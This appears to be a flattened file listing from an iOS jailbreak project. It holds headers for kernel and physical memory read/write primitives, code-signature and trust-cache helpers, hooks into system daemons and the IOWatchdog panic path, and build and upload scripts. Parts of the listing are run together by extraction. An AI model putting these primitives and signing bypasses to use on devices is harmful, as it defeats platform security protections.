void JBLogDebug(const char *format, ...);
void JBLogError(const char *format, ...);
#else
#define JBLogDebug(format ...)
#define JBLogError(format ...)
#endif

//#define JBLogDebug(format ...) NSLog(@format)
//#define JBLogError(format ...) NSLog(@format)

--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/macho.h:
--------------------------------------------------------------------------------
#import
#import
#import
#import
#import
#import
#import
#import
#import
#import "csblob.h"

void machoEnumerateArchs(FILE* machoFile, void (^archEnumBlock)(struct fat_arch* arch, uint32_t archMetadataOffset, uint32_t archOffset, BOOL* stop));
void machoGetInfo(FILE* candidateFile, bool *isMachoOut, bool *isLibraryOut);
int64_t machoFindArch(FILE *machoFile, uint32_t subtypeToSearch);
int64_t machoFindBestArch(FILE *machoFile);

void machoEnumerateLoadCommands(FILE *machoFile, uint32_t archOffset, void (^enumerateBlock)(struct load_command cmd, uint32_t cmdOffset));
void machoFindLoadCommand(FILE *machoFile, uint32_t cmd, void *lcOut, size_t lcSize);
void machoFindCSData(FILE* machoFile, uint32_t archOffset, uint32_t* outOffset, uint32_t* outSize);

void machoEnumerateDependencies(FILE *machoFile, uint32_t archOffset, NSString *machoPath, NSString *executablePath, void (^enumerateBlock)(NSString *dependencyPath));

void machoCSDataEnumerateBlobs(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize, void (^enumerateBlock)(struct CSBlob blobDescriptor, uint32_t blobDescriptorOffset, BOOL *stop));
NSData *machoCSDataCalculateCDHash(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize);
bool machoCSDataIsAdHocSigned(FILE *machoFile, uint32_t CSDataStart, uint32_t CSDataSize);
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/pac.S:
--------------------------------------------------------------------------------
.text

.align 4

// Endless loop that stores 1 into gUserReturnDidHappen on every iteration.
.global _pac_loop
_pac_loop:
	mov x0, #1
	adrp x1, _gUserReturnDidHappen@PAGE
	str x0, [x1, _gUserReturnDidHappen@PAGEOFF]
	b _pac_loop
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/patchfind.h:
--------------------------------------------------------------------------------
void *patchfind_seek_back(void *startPtr, uint32_t toInstruction, uint32_t mask, unsigned int maxSearch);
void *patchfind_find(int imageIndex, unsigned char *bytesToSearch, unsigned char *byteMask, size_t byteCount);
--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/pplrw.h:
--------------------------------------------------------------------------------
#import

#define PPLRW_USER_MAPPING_OFFSET 0x7000000000
#define PPLRW_USER_MAPPING_TTEP_IDX (PPLRW_USER_MAPPING_OFFSET / 0x1000000000)

typedef enum {
    kPPLRWStatusNotInitialized = 0,
    kPPLRWStatusInitialized = 1
} PPLRWStatus;
extern PPLRWStatus gPPLRWStatus;

uint64_t unsign_kptr(uint64_t a);

uint64_t phystokv(uint64_t pa);
uint64_t vtophys(uint64_t ttep, uint64_t va);
uint64_t kvtophys(uint64_t va);
void *phystouaddr(uint64_t pa);
void *kvtouaddr(uint64_t va);

uint64_t kaddr_to_pa(uint64_t virt, bool *err);

int physreadbuf(uint64_t physaddr, void* output, size_t size);
int physwritebuf(uint64_t physaddr, const void* input, size_t size);
int kreadbuf(uint64_t kaddr, void* output, size_t size);
int kwritebuf(uint64_t kaddr, const void* input, size_t size);

uint64_t physread64(uint64_t pa);
uint64_t physread_ptr(uint64_t va);
uint32_t physread32(uint64_t pa);
uint16_t physread16(uint64_t pa);
uint8_t physread8(uint64_t pa);

int physwrite64(uint64_t pa, uint64_t v);
int physwrite32(uint64_t pa, uint32_t v);
int physwrite16(uint64_t pa, uint16_t v);
int physwrite8(uint64_t pa, uint8_t v);

uint64_t kread64(uint64_t va);
uint64_t kread_ptr(uint64_t va);
uint32_t kread32(uint64_t va);
uint16_t kread16(uint64_t va);
uint8_t kread8(uint64_t va);

int kwrite64(uint64_t va, uint64_t v);
int kwrite32(uint64_t va, uint32_t v);
int kwrite16(uint64_t va, uint16_t v);
int kwrite8(uint64_t va, uint8_t v);

void initPPLPrimitives(void);


--------------------------------------------------------------------------------
/BaseBin/libjailbreak/src/signatures.h:
--------------------------------------------------------------------------------
#import
int getCSBlobOffsetAndSize(FILE* machoFile, uint32_t* outOffset, uint32_t* outSize);

NSString *processRpaths(NSString *path, NSString *tokenName, NSArray *rpaths);
NSString *resolveLoadPath(NSString *loadPath, NSString *machoPath, NSString *sourceExecutablePath, NSArray *rpaths);
int evaluateSignature(NSURL* fileURL, NSData **cdHashOut, BOOL *isAdhocSignedOut);
BOOL isCdHashInTrustCache(NSData *cdHash);
int loadEmbeddedSignature(FILE *file);
--------------------------------------------------------------------------------
/BaseBin/roothidehooks/.gitignore:
--------------------------------------------------------------------------------
.theos/
packages/
.DS_Store

--------------------------------------------------------------------------------
/BaseBin/roothidehooks/Makefile:
--------------------------------------------------------------------------------
TARGET := iphone:clang:latest:15.0
INSTALL_TARGET_PROCESSES = lsd cfprefsd
FINALPACKAGE = 1
ARCHS = arm64e

THEOS_PACKAGE_SCHEME = roothide

include $(THEOS)/makefiles/common.mk

TWEAK_NAME = roothidehooks

roothidehooks_FILES = $(wildcard *.x) $(wildcard *.c) $(wildcard *.m)
roothidehooks_CFLAGS = -Werror -fobjc-arc -I../_shared
roothidehooks_LDFLAGS = -rpath @loader_path/.jbroot/Library/Frameworks -rpath @loader_path/fallback

lsd.x_CFLAGS = -fno-objc-arc #lsd using mrc

include $(THEOS_MAKE_PATH)/tweak.mk

after-roothidehooks-all::
	install_name_tool -change @loader_path/.jbroot/usr/lib/libsubstrate.dylib @rpath/CydiaSubstrate.framework/CydiaSubstrate $(THEOS_OBJ_DIR)/roothidehooks.dylib
	ldid -S $(THEOS_OBJ_DIR)/roothidehooks.dylib

--------------------------------------------------------------------------------
/BaseBin/roothidehooks/common.h:
--------------------------------------------------------------------------------

#include


bool isJailbreakPath(const char* path);

bool isNormalAppPath(const char* path);

bool isSandboxedApp(pid_t pid, const char* path);

int proc_pidpath(int pid, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);

bool isBlacklisted(const char* path);
BOOL isBlacklistedApp(NSString* identifier);

/* csops operations */
#define CS_OPS_STATUS 0 /* return status */
#define CS_PLATFORM_BINARY 0x04000000 /* this is a platform binary */
int csops(pid_t pid, unsigned int ops, void * useraddr, size_t usersize);

//These apps may be signed with a (fake) certificate
#define SENSITIVE_APP_LIST @[ \
    @"com.icraze.gtatracker", \
    @"com.Alfie.TrollInstallerX", \
    @"com.opa334.Dopamine", \
    @"com.opa334.Dopamine.roothide", \
    @"com.opa334.Dopamine-roothide", \
]

--------------------------------------------------------------------------------
/BaseBin/roothidehooks/installd.x:
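--------------------------------------------------------------------------------
#import

// BOOTLOOP RISK, DO NOT TOUCH
/*%hook MIGlobalConfiguration

- (NSMutableDictionary *)_bundleIDMapForBundlesInDirectory:(NSURL *)directoryURL
	withExtension:(NSString *)extension
	loadingAdditionalKeys:(NSSet *)additionalKeys
{
	NSLog(@"_bundleIDMapForBundlesInDirectory(%@, %@, %@)", directoryURL, extension, additionalKeys);

	if ([directoryURL.path isEqualToString:@"/Applications"] && [extension isEqualToString:@"app"]) {
		NSMutableDictionary *origMap = %orig;

		NSURL *rootlessAppDir = [NSURL fileURLWithPath:@"/var/jb/Applications" isDirectory:YES];
		NSMutableDictionary *rootlessAppsMap = %orig(rootlessAppDir, extension, additionalKeys);
		[origMap addEntriesFromDictionary:rootlessAppsMap];
		return origMap;
	}

	return %orig;
}

%end*/

// Initialise the hooks of this file; the only hook above is commented out.
void installdInit(void)
{
    %init();
}

--------------------------------------------------------------------------------
/BaseBin/roothidehooks/main.x:
--------------------------------------------------------------------------------
#import
#import

#ifndef DEBUG
#define NSLog(args...)
#endif

/*
 * Return the path of the running executable, or nil when it cannot be
 * obtained.
 */
NSString* safe_getExecutablePath()
{
    // Zero-filled so the buffer never holds indeterminate bytes.
    char executablePathC[PATH_MAX] = {0};
    uint32_t executablePathCSize = sizeof(executablePathC);
    // _NSGetExecutablePath returns non-zero when the buffer is too small and
    // then leaves it unfilled; building a string from it would read garbage.
    if (_NSGetExecutablePath(&executablePathC[0], &executablePathCSize) != 0) {
        return nil;
    }
    return [NSString stringWithUTF8String:executablePathC];
}

// Return the last path component of the executable path (nil when the path is unavailable).
NSString* getProcessName()
{
    return safe_getExecutablePath().lastPathComponent;
}

// Constructor: pick the per-process initialiser by executable name. The
// process is selected by name only; the installd branch is disabled.
%ctor
{
    NSLog(@"roothidehooks coming... %@", safe_getExecutablePath());
    NSString *processName = getProcessName();
    /*if ([processName isEqualToString:@"installd"]) {
        extern void installdInit(void);
        installdInit();
    }
    else*/ if ([processName isEqualToString:@"cfprefsd"]) {
        extern void cfprefsdInit(void);
        cfprefsdInit();
    }
    else if ([processName isEqualToString:@"lsd"]) {
        extern void lsdInit(void);
        lsdInit();
    }
    else if ([processName isEqualToString:@"SpringBoard"]) {
        extern void sbInit(void);
        sbInit();
    }
}
--------------------------------------------------------------------------------
/BaseBin/roothidehooks/pathhook.x:
--------------------------------------------------------------------------------
#import
#import
#include

#ifndef DEBUG
#define NSLog(args...)
#endif

CFURLRef (*orig__CFCopyHomeDirURLForUser)(const char *username, bool fallBackToHome) = NULL;

/*
 * Replacement for __CFCopyHomeDirURLForUser.
 *
 * Calls the original; when rootfs() of the returned path starts with
 * "/rootfs/", the URL is replaced by one built from jbroot() of that path.
 * If the replacement cannot be built, the original URL is returned unchanged.
 */
CFURLRef new__CFCopyHomeDirURLForUser(const char *username, bool fallBackToHome)
{
    CFURLRef url = orig__CFCopyHomeDirURLForUser(username, fallBackToHome);
    // Passing NULL to the CFURL calls below would crash the host process.
    if (!url) {
        return NULL;
    }

    char path[PATH_MAX]={0};
    if(CFURLGetFileSystemRepresentation(url, 0, (UInt8*)path, sizeof(path)))
    {
        // NOTE(review): rootfs()/jbroot() are declared elsewhere; the NULL
        // checks are defensive, confirm whether they can return NULL.
        const char* jbpath = rootfs(path);
        if(jbpath && strncmp(jbpath, "/rootfs/", sizeof("/rootfs/")-1) == 0)
        {
            const char* newpath = jbroot(path);
            CFURLRef replacement = NULL;
            if(newpath)
            {
                replacement = CFURLCreateFromFileSystemRepresentation(kCFAllocatorDefault, (const UInt8*)newpath, strlen(newpath), true);
            }
            // Release the original only once the replacement exists, so the
            // caller never receives NULL where the original call succeeded.
            if(replacement)
            {
                CFRelease(url);
                url = replacement;
            }
        }
    }

    return url;
}

// Exported entry point: look up __CFCopyHomeDirURLForUser in CoreFoundation and hook it.
__attribute__((visibility("default"))) void pathhook()
{
    NSLog(@"pathhook..");

    MSImageRef coreFoundationImage = MSGetImageByName("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation");
    void* _CFCopyHomeDirURLForUser_ptr = MSFindSymbol(coreFoundationImage, "__CFCopyHomeDirURLForUser");
    if(_CFCopyHomeDirURLForUser_ptr)
    {
        MSHookFunction(_CFCopyHomeDirURLForUser_ptr, (void *)&new__CFCopyHomeDirURLForUser, (void **)&orig__CFCopyHomeDirURLForUser);
        NSLog(@"hook __CFCopyHomeDirURLForUser %p => %p : %p", _CFCopyHomeDirURLForUser_ptr, new__CFCopyHomeDirURLForUser, orig__CFCopyHomeDirURLForUser);
    }
}

--------------------------------------------------------------------------------
/BaseBin/systemhook/Makefile:
--------------------------------------------------------------------------------
TARGET = systemhook.dylib
CC = clang

CFLAGS = -Werror -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -Wno-deprecated-declarations -Os -moutline
LDFLAGS = -dynamiclib

sign: $(TARGET)
	@strip -N $^
	@ldid -S $^

$(TARGET): $(wildcard src/*.c)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^

clean:
	@rm -f $(TARGET)
--------------------------------------------------------------------------------
/BaseBin/systemhook/src/common.h:
--------------------------------------------------------------------------------
#include
#include
#include

#define SYSLOG(...) {openlog("systemhook",LOG_PID,LOG_AUTH);syslog(LOG_DEBUG, __VA_ARGS__);closelog();}

#define JB_ENV_REQUIRED_COUNT 5

extern char* JBRAND;
extern char* JBROOT;

extern char *JB_SandboxExtensions;
extern char *JB_SandboxExtensions2;
extern char *JB_RootPath;
extern bool swh_is_debugged;
// Builds JB_RootPath + path in an alloca'd PATH_MAX buffer; the result lives
// only as long as the calling function's stack frame.
#define JB_ROOT_PATH(path) ({ \
    char *outPath = alloca(PATH_MAX); \
    strlcpy(outPath, JB_RootPath, PATH_MAX); \
    strlcat(outPath, path, PATH_MAX); \
    (outPath); \
})

bool stringStartsWith(const char *str, const char* prefix);
bool stringEndsWith(const char* str, const char* suffix);

int64_t jbdswFixSetuid(void);
int64_t jbdswProcessBinary(const char *filePath);
int64_t jbdswProcessLibrary(const char *filePath);
int64_t jbdswDebugMe(void);
int64_t jbdswInterceptUserspacePanic(const char *messageString);

int64_t jbdswRebootUserspace();
int64_t jbdswPatchSpawn(int pid, bool resume);
int64_t jbdswPatchExecAdd(const char* execfile, bool resume);
int64_t jbdswPatchExecDel(const char* execfile);
int64_t jbdswLockDSCPage(uint64_t address, uint64_t size);

int resolvePath(const char *file, const char *searchPath, int (^attemptHandler)(char *path));
int spawn_hook_common(pid_t *restrict pid, const char *restrict path,
    const posix_spawn_file_actions_t *restrict file_actions,
    const posix_spawnattr_t *restrict attrp,
    char *const argv[restrict],
    char *const envp[restrict],
    void *pspawn_org);
--------------------------------------------------------------------------------
/BaseBin/systemhook/src/envbuf.h:
--------------------------------------------------------------------------------
int envbuf_len(const char *envp[]);
char **envbuf_mutcopy(const char *envp[]);
void envbuf_free(char *envp[]);
int envbuf_find(const char *envp[], const char *name);
const char *envbuf_getenv(const char *envp[], const char *name);
void envbuf_setenv(char **envpp[], const char *name, const char *value, int overwrite);
void envbuf_unsetenv(char **envpp[], const char *name);
--------------------------------------------------------------------------------
/BaseBin/systemhook/src/launchd.h:
--------------------------------------------------------------------------------
#define OS_ALLOC_ONCE_KEY_MAX 100

struct _os_alloc_once_s {
    long once;
    void *ptr;
};

struct xpc_global_data {
    uint64_t a;
    uint64_t xpc_flags;
    mach_port_t task_bootstrap_port; /* 0x10 */
#ifndef _64
    uint32_t padding;
#endif
    xpc_object_t xpc_bootstrap_pipe; /* 0x18 */
    // and there's more, but you'll have to wait for MOXiI 2 for those...
    // ...
};

extern struct _os_alloc_once_s _os_alloc_once_table[];
extern void* _os_alloc_once(struct _os_alloc_once_s *slot, size_t sz, os_function_t init);

--------------------------------------------------------------------------------
/BaseBin/systemhook/upload.sh:
--------------------------------------------------------------------------------
set -e

PROJECT_NAME=systemhook.dylib
DEVICE=root@localhost
PORT=2223

make
ssh $DEVICE -p $PORT "rm -rf /tmp/$PROJECT_NAME"
scp -P$PORT ./$PROJECT_NAME $DEVICE:/tmp/$PROJECT_NAME
ssh $DEVICE -p $PORT "/basebin/jbctl rebuild_trustcache"
--------------------------------------------------------------------------------
/BaseBin/tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/tar
--------------------------------------------------------------------------------
/BaseBin/upload.sh:
--------------------------------------------------------------------------------
#!/bin/sh

./pack.sh || exit

DEVICE=root@iphone11.local
PORT=22
ssh $DEVICE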
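-p $PORT "rm -rf /rootfs/var/mobile/Documents/basebin.tar" 8 | scp -P$PORT ../Dopamine/Dopamine/bootstrap/basebin.tar $DEVICE:/rootfs/var/mobile/Documents/basebin.tar 9 | ssh $DEVICE -p $PORT "/basebin/jbctl update basebin /var/mobile/Documents/basebin.tar" 10 | 11 | -------------------------------------------------------------------------------- /BaseBin/watchdoghook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = watchdoghook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2 5 | LDFLAGS = -dynamiclib -rpath @loader_path/.jbroot/Library/Frameworks -rpath @loader_path/fallback -L../_shared -lellekit -framework IOKit 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.m) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/watchdoghook/src/main.m: --------------------------------------------------------------------------------
// NOTE(review): this file opens with four system #include directives whose
// header names were lost when the listing was extracted. They have to supply
// dlsym/RTLD_DEFAULT, the Mach port types and the IOKit calls hooked below;
// restore them from the repository rather than from this page.
#include <string.h> // memchr/memcpy for the bounded message copy below

#include "substrate.h"

// Upper bound for the stack copy made when the caller's buffer carries no NUL
// terminator. The value is a reviewer-chosen cap, not taken from any API.
#define WATCHDOG_MESSAGE_COPY_MAX 1024

// Looked up by name in initializer(); stays NULL when the symbol is not
// exported by any image that is loaded at that point.
int64_t (*jbdswInterceptUserspacePanic)(const char *messageString) = NULL;
// Filled in by MSHookFunction with the un-hooked implementations.
kern_return_t (*IOConnectCallStructMethod_orig)(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt) = NULL;
kern_return_t (*IOServiceOpen_orig)(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect);
// Connection returned by the last successful IOServiceOpen on an IOWatchdog
// service; MACH_PORT_NULL until one has been seen.
mach_port_t gIOWatchdogConnection = MACH_PORT_NULL;

/*
 * Replacement for IOServiceOpen.
 *
 * Forwards to the original and returns its result unchanged. When the open
 * succeeded and the service conforms to "IOWatchdog", the resulting connection
 * is remembered in gIOWatchdogConnection so that
 * IOConnectCallStructMethod_hook can recognise calls made on it.
 */
kern_return_t IOServiceOpen_hook(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect)
{
    kern_return_t result = IOServiceOpen_orig(service, owningTask, type, connect);
    if (result != KERN_SUCCESS || connect == NULL) {
        return result;
    }
    if (IOObjectConformsTo(service, "IOWatchdog")) {
        gIOWatchdogConnection = *connect;
    }
    return result;
}

/*
 * Replacement for IOConnectCallStructMethod.
 *
 * A call with selector 2 on the remembered IOWatchdog connection is not sent
 * to the kernel; its input buffer is handed to jbdswInterceptUserspacePanic as
 * a C string and that function's result is returned. Every other call is
 * forwarded to the original unchanged.
 *
 * Guards relative to a plain cast-and-call:
 *  - nothing is intercepted until an IOWatchdog connection has actually been
 *    recorded, so a call on MACH_PORT_NULL no longer matches the initial
 *    value of gIOWatchdogConnection;
 *  - if the handler symbol was not resolved, the call is forwarded instead of
 *    jumping through a NULL function pointer;
 *  - the buffer is only read as a string up to inputStructCnt bytes; when no
 *    terminator is found inside that range a truncated, terminated stack copy
 *    is passed instead.
 */
kern_return_t IOConnectCallStructMethod_hook(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt)
{
    if (gIOWatchdogConnection != MACH_PORT_NULL
        && connection == gIOWatchdogConnection
        && selector == 2 // presumably the userspace-panic method, going by the handler's name
        && jbdswInterceptUserspacePanic != NULL) {
        const char *message = (const char *)inputStruct;
        char boundedCopy[WATCHDOG_MESSAGE_COPY_MAX];

        // A NULL buffer is passed through as before; a non-NULL one must not
        // be read past the size the caller declared.
        if (message != NULL && memchr(message, '\0', inputStructCnt) == NULL) {
            size_t copyLen = inputStructCnt;
            if (copyLen > sizeof(boundedCopy) - 1) {
                copyLen = sizeof(boundedCopy) - 1;
            }
            memcpy(boundedCopy, message, copyLen);
            boundedCopy[copyLen] = '\0';
            message = boundedCopy;
        }
        // The handler returns int64_t; the narrowing to kern_return_t was
        // implicit before and is spelled out here.
        return (kern_return_t)jbdswInterceptUserspacePanic(message);
    }
    return IOConnectCallStructMethod_orig(connection, selector, inputStruct, inputStructCnt, outputStruct, outputStructCnt);
}

/*
 * Load-time constructor: resolves the panic handler by name and installs both
 * hooks. The dlsym result may be NULL; IOConnectCallStructMethod_hook checks
 * for that before using it.
 */
__attribute__((constructor)) static void initializer(void)
{
    jbdswInterceptUserspacePanic = dlsym(RTLD_DEFAULT, "jbdswInterceptUserspacePanic");
    MSHookFunction(IOServiceOpen, (void *)&IOServiceOpen_hook, (void **)&IOServiceOpen_orig);
    MSHookFunction(IOConnectCallStructMethod, (void *)&IOConnectCallStructMethod_hook, (void **)&IOConnectCallStructMethod_orig);
}
-------------------------------------------------------------------------------- /Dopamine/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /Dopamine.tipa 3 | /Dopamine/bootstrap/basebin.tar -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 |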
-------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftfulLoadingIndicators", 6 | "repositoryURL": "https://github.com/SwiftfulThinking/SwiftfulLoadingIndicators", 7 | "state": { 8 | "branch": null, 9 | "revision": "85858c0246dcd781228301f9928519f75ce89758", 10 | "version": "0.0.4" 11 | } 12 | }, 13 | { 14 | "package": "SwiftMachO", 15 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 16 | "state": { 17 | "branch": "master", 18 | "revision": "7bcffb07259191f7103ded3d29c77f05b7fed396", 19 | "version": null 20 | } 21 | }, 22 | { 23 | "package": "SwiftUtils", 24 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 25 | "state": { 26 | "branch": "master", 27 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 28 | "version": null 29 | } 30 | }, 31 | { 32 | "package": "zstd", 33 | "repositoryURL": "https://github.com/facebook/zstd.git", 34 | "state": { 35 | "branch": "dev", 36 | "revision": "e256e4327459b77b14b300a7bc72b5a931cd1e56", 37 | "version": null 38 | } 39 | } 40 | ] 41 | }, 42 | "version": 1 43 | } 44 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "color" : { 5 | "color-space" : "srgb", 6 | "components" : { 7 | "alpha" : "1.000", 8 | "blue" : "0.529", 9 | "green" : "0.667", 10 | "red" : "0.020" 11 | } 12 | }, 13 | "idiom" : "universal" 14 | } 15 | ], 16 | "info" : { 17 | "author" : "xcode", 18 | "version" : 1 19 | } 20 | } 21 | -------------------------------------------------------------------------------- 
/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x.png 
-------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@2x.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-83.5@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-83.5@2x.png -------------------------------------------------------------------------------- 
